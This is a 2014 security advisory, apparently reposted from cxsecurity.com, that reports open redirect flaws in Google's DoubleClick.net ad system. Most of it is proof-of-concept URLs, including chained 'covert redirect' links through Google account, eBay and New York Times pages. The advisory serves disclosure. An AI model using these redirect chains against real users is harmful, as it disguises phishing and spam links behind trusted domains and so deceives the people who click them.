Google DoubleClick Open Redirect

2014.11.15
Credit: Wang Jing
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-601

Google DoubleClick.net(Advertising) System URL Redirection Vulnerabilities Can be Used by Spammers Although Google does not include Open Redirect vulnerabilities in its bug bounty program, its preventive measures against Open Redirect attacks have been quite thorough and effective to date. However, Google might have overlooked the security of its DoubleClick.net <http://doubleclick.net/> ?advertising system. After some test, it is found that most of the redirection URLs within DoubleClick.net <http://doubleclick.net/> are vulnerable to Open Redirect vulnerabilities. Many redirection are likely to be affected. These redirections can be easily used by spammers, too. Some URLs belong to Googleads.g.Doubleclick.net <http://googleads.g.doubleclick.net/> are vulnerable to Open Redirect attacks, too. While Google prevents similar URL redirections other than Googleads.g.Doubleclick.net <http://googleads.g.doubleclick.net/>. Attackers can use URLs related to Google Account to make the attacks more powerful. Moreover, these vulnerabilities can be used to attack other companies such as Google, eBay, The New York Times, e.g. by bypassing their Open Redirect filters(Covert Redirect). *(1) Background Related to Google DoubleClick.net.* *(1.1) What is DoubleClick.net?* "DoubleClick is the ad technology foundation to create, transact, and manage digital advertising for the world's buyers, creators and sellers." http://www.google.com.sg/doubleclick/ *(1.2) Reports Related to Google DoubleClick.net Used by Spammers* *(1.2.1)* Google DoublClick.net has been used by spammers for long time. The following is a report in 2008. "The open redirect had become popular with spammers trying to lure users into clicking their links, as they could be made to look like safe URLs within Google's domain." https://www.virusbtn.com/blog/2008/06_03a.xml?comments *(1.2.2)* Mitechmate published a blog related to DoubleClick.net spams in 2014. "Ad.doubleclick.net <http://ad.doubleclick.net/> is recognized as a perilous adware application that causes unwanted redirections when surfing on the certain webpages. Actually it is another browser hijacker that aims to distribute frauds to make money.Commonly people pick up Ad.doubleclick virus when download softwares, browse porn site or read spam email attachments. It enters into computer sneakily after using computer insecurely.Ad.doubleclick.net <http://insecurely.ad.doubleclick.net/> is not just annoying, this malware traces users? personal information, which would be utilized for cyber criminal." http://blog.mitechmate.com/remove-ad-doubleclick-net-redirect-virus/ *(1.2.3)* Malwarebytes posted a news related to DoubleClick.net malvertising in 2014. "Large malvertising campaign under way involving DoubleClick and Zedo" https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/ *(2) DoubleClick.net System URL Redirection Vulnerabilities Details.* These vulnerabilities can be attacked without user login. Tests were performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7. Used webpages for the following tests. The webpage address is " http://www.tetraph.com/security". We can suppose that this webpage is malicious. *(2.1) Vulnerable URLs Related to Googleads.g.Doubleclick.net <http://googleads.g.doubleclick.net/>.* *(2.1.1)* Some URLs belong to googleads.g.doubleclick.net are vulnerable to Open Redirect attacks. While Google prevents similar URL redirection other than googleads.g.doubleclick.net. Vulnerable URLs: http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.sharp-world.com/igzo http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://economics.wj.com POC: http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security Attackers can make use of the following URLs to make the attacks more powerful, i.e. https://www.google.com/accounts/ServiceLogin?continue=https%3A%2F%2Fsites.google.com%2Fsite%2Fissrabhi%2Fhome&service=jotspot&passive=true&ul=1 https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fwww.orkut.com%2FRedirLogin%3Fmsg%3D1%26auth%3D* POC: https://www.google.com/accounts/ServiceLogin?continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fessaybeans%2Freflections%2Fsolitude.html https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.diebiyi.com%2Farticles *(2.1.2)* While Google prevents similar URL redirection other than googleads.g.doubleclick.net , e.g. http://www.googleadservices.com/pagead/aclk?sa=L&ai=C8u9OibgEU_XIOKrNswfrzYDgAY2FhfgE1aLjnoYB-7qSCxADILhPKANQrt2khP3_____AWC_BaAB8-vV0gPIAQGqBChP0AshNp656okgv3tSxmgc3JZeuS25cM0HlW9wUqHwxL8nk75mFPqsgAf1k6otkAcB&num=3&val=ChA2MWI5ODZkYzA4MTlmZmRlEN-mlZgFGgghk-txLb-9bSABKAAwhPDs-dD_xPHhATj6w5KYBUD6w5KYBQ&sig=AOD64_2f3wWGlepm4KMYlixE15qmjC1FGw&adurl=http://freshservice.com/free-service-desk/ http://www.googleadservices.com/pagead/aclk?sa=L&ai=C6w2J2VL1UtqeFtPFsQe_xICACOur9I0Gm4qOwXKd4q7LvAEQAiC4TygCUPrp_p7______wFgvwWgAY2TjcoDyAEBqQJGONe13HWqPqoEIk_QksMhB61R5_EBc-rRl0G3mUtOQjLemb4NjAETa6dj-AGAB9vs8jWQBwE&num=2&val=ChA5MDRhYzc4NjJiNjFlMzZlEO6g15cFGgjqLoQCBAXi2SABKAAw6sfV44GF7cZ_OMbI1ZcFQMbI1ZcF&sig=AOD64_1g--5hg2Tc0L5irweEKYqbh1FwSw&adurl=https://www.singtelshop.com/mobile/phone-details.jsf%3FbrandId%3D122%26modelId%3DZ10 *(2.2) Vulnerable URLs Related to DoubleClick.net.* Vulnerable URLs 1: http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://noteok.zdnet.com.cn/notebook/2013/1113/2995493.shtml http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://noteok.zdnet.com.cn/notebook/2013/1113/2995493.shtml POC: http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.inzeed.com/kaleidoscope/ http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.tetraph.com/security Vulnerable URLs 2: http://ad.doubleclick.net/clk;275260754;102106837;b?http://zerodistance.cio.com http://ad.doubleclick.net/clk;276304929;103445101;w?http://tracker.marinsm.com/rd POC: http://ad.doubleclick.net/clk;275260754;102106837;b?http://www.inzeed.com/kaleidoscope/ http://ad.doubleclick.net/clk;276304929;103445101;w?http://www.tetraph.com/security Vulnerable URLs 3: http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http%3A%2F%2Fib.adnxs.com http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http%3A%2F%2Fwww.reuters.com% POC: http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http://www.inzeed.com/kaleidoscope/ http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http://www.tetraph.com/security ... We can see that Google DoubleClick.net has Open Redirect vulnerabilities and could be misused by spammers. *(2.3)* POC Video: https://www.youtube.com/watch?v=lfKHVGHWvk8&feature=youtu.be *(3) Google DoubleClick.net Can Adversely Affect Other Websites.* At the same time, Google DoubleClick.net can be used to do "Covert Redirect" to other websites, such as Google, eBay, The New York Times, etc.(Bypass other websites' Open Redirect filters) *(3.1)* Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net <http://googleads.g.doubleclick.net/> Vulnerable URL: https://www.google.com/accounts/Logout?service=writely&continue=https://google.com/ POC: https://www.google.com/accounts/Logout?service=wise&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fsecurity More Details: Video: https://www.youtube.com/watch?v=btuSq89khcQ&feature=youtu.be Blog: http://computerobsess.blogspot.com/2014/11/google-covert-redirect-vulnerability.html *(3.2)* eBay Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net <http://googleads.g.doubleclick.net/> Vulnerable URL: http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/ POC: http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/aclk?sa=L%26ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV%26num=0%26sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ%26client=ca-pub-0466582109566532%26adurl=http://www.tetraph.com/security More Details: Video: https://www.youtube.com/watch?v=a4H-u17Y9ks Blog: http://tetraph.blogspot.com/2014/11/ebay-covert-redirect-vulnerability.html *(3.3)* The New York Times (Nytimes.com) Covert Redirect Vulnerability Based on Google Doubleclick.net Vulnerable URL: http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ffacebook%2Ecom%2Fall%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion POC: http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ftetraph%2Ecom%2Fsecurity%3F%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion More Details: Video: https://www.youtube.com/watch?v=3XtrUqzxNW0 Blog: http://computerobsess.blogspot.com/2014/11/nytimes-covert-redirect-vulnerability.html These vulnerabilities were reported to Google earlier in 2014. But it seems that Google has yet taken any actions. All of the vulnerabilities are still unpatched. Reporter: Wang Jing, Mathematics, Nanyang Technological University http://www.tetraph.com/wangjing More Details: http://tetraph.com/security/open-redirect/google-doubleclick-netadvertising-system-url-redirection-vulnerabilities-can-be-used-by-spammers/

References:

http://tetraph.com/security/open-redirect/google-doubleclick-netadvertising-system-url-redirection-vulnerabilities-can-be-used-by-spammers/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top